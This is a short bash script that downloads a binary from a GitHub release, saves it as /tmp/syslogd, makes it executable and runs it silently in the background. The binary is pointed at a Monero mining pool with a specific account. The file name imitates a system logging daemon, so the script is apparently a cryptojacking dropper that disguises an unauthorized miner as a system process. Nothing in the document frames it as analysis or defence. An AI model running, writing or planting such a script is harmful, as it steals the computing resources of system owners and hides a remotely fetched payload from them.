#!/bin/bash
wget https://github.com/vedhagsvp/aplamner/releases/download/nertas/greavet -O /tmp/syslogd
chmod +x /tmp/syslogd
nohup /tmp/syslogd --algo xmr --account CP_udnvh2owpq --worker $(echo $(shuf -i 1-15000 -n 1)-VTEOA23) --pool xmr.hk.apool.io:3334 > /dev/null 2>&1
